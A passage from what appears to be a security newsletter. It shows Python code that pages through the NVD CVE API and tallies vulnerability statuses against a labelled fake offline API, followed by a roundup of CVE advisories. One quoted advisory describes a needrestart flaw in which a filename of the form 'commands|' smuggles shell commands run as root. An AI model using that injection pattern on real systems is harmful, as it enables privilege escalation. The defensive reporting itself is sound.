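              page_size: int = PAGE_SIZE) -> List[dict]:
    """Advance startIndex by the number of records actually returned until
    totalResults is reached; an empty page also stops the loop so a
    misreported total cannot spin forever."""
    vulns: List[dict] = []
    start = 0
    while True:
        page = fetch(build_url(pub_start, pub_end, start, page_size))
        batch = page.get("vulnerabilities", [])
        vulns.extend(batch)
        total = int(page.get("totalResults", 0))
        start += len(batch)
        if not batch or start >= total:
            return vulns


def vuln_status_counts(vulns: List[dict]) -> Dict[str, int]:
    """Equivalent of GROUP BY cves->>'cve'->>'vulnStatus'."""
    counts: Dict[str, int] = {}
    for v in vulns:
        status = v.get("cve", {}).get("vulnStatus", "Unknown")
        counts[status] = counts.get(status, 0) + 1
    return counts


def vuln_status_pct(vulns: List[dict]) -> Dict[str, float]:
    """Share of each status, rounded to two decimals like the DuckDB query."""
    counts = vuln_status_counts(vulns)
    total = sum(counts.values()) or 1
    return {s: round(100.0 * c / total, 2) for s, c in counts.items()}


# ---- constructed offline stand-in for the NVD endpoint (not real data) ----

def sample_records() -> List[dict]:
    """Ten placeholder records; the CVE-0000-* ids are deliberately unreal."""
    statuses = (["Awaiting Analysis"] * 5 + ["Received"] * 3
                + ["Undergoing Analysis"] * 2)
    return [{"cve": {"id": f"CVE-0000-{i:04d}", "vulnStatus": s}}
            for i, s in enumerate(statuses)]


def make_fake_api(records: List[dict]) -> Fetcher:
    """Serve `records` with the same paging fields the real API reports."""
    def fetch(url: str) -> dict:
        qs = parse_qs(urlparse(url).query)
        start = int(qs["startIndex"][0])
        n = int(qs["resultsPerPage"][0])
        return {
            "resultsPerPage": n,
            "startIndex": start,
            "totalResults": len(records),
            "vulnerabilities": records[start:start + n],
        }
    return fetch


if __name__ == "__main__":
    # Three-record pages force several round trips through the loop.
    fake = make_fake_api(sample_records())
    day = fetch_all("2024-11-08T00:00:00.000", "2024-11-08T23:59:59.000",
                    fetch=fake, page_size=3)
    print(len(day), vuln_status_counts(day), vuln_status_pct(day))
```

Swapping `fetch=fake` for the default `http_fetch` runs the same loop against the live endpoint; the records it returns are the same objects the `yesterday` table holds, so they can be written out as JSON and loaded with `read_json` if the rest of the analysis should stay in DuckDB.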
This is a super fun extension to play with!
FIN
Remember, you can follow and interact with the full text of The Daily Drop’s free posts on Mastodon via @dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev
☮️
It has been 0 days since I've had to tap the sign:
https://infosec.exchange/@ckure/111970971640286655
"CVE-2024-10224: local attackers can execute arbitrary shell commands as root by tricking needrestart into open()ing a filename of the form "commands|" (technically, this vulnerability is in Perl's ScanDeps module, but it is unclear whether this module was ever meant to operate on attacker-controlled files or not)."
https://www.qualys.com/2024/11/19/needrestart/needrestart.txt
##[ZDI-24-1515|CVE-2024-11394] (0Day) Hugging Face Transformers Trax Model Deserialization of Untrusted Data Remote Code Execution Vulnerability (CVSS 8.8; Credit: The_Kernel_Panic) https://www.zerodayinitiative.com/advisories/ZDI-24-1515/
##[ZDI-24-1514|CVE-2024-11393] (0Day) Hugging Face Transformers MaskFormer Model Deserialization of Untrusted Data Remote Code Execution Vulnerability (CVSS 8.8; Credit: The_Kernel_Panic) https://www.zerodayinitiative.com/advisories/ZDI-24-1514/
##Redis CVE-2024-31449: How to Reproduce and Mitigate the Vulnerability https://redrays.io/blog/redis-cve-2024-31449-how-to-reproduce-and-mitigate-the-vulnerability/
##Additional Fortinet security advisories:
No mention of exploitation.
#Fortinet #PatchTuesday #CVE #vulnerability #infosec #cybersecurity
##GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7
No mention of exploitation.
#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity
##CVE ID: CVE-2021-41277
Vendor: Metabase
Product: Metabase
Date Added: 2024-11-12
Vulnerability: Metabase GeoJSON API Local File Inclusion Vulnerability
Notes: https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr ; https://nvd.nist.gov/vuln/detail/CVE-2021-41277
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2021-41277
CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!
#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity
##Xen Security Advisory 464 v2 (CVE-2024-45819) - libxl leaks data to PVH guests via ACPI tables
##New blog post dives deep into a lesser-known macOS attack surface, revealing over 10 fresh sandbox escape vulnerabilities, including CVE-2023-27944, CVE-2023-32414, and CVE-2024-27864. The overlooked XPC services in system frameworks have opened up critical bypass paths for sandbox and SIP restrictions.
https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/
##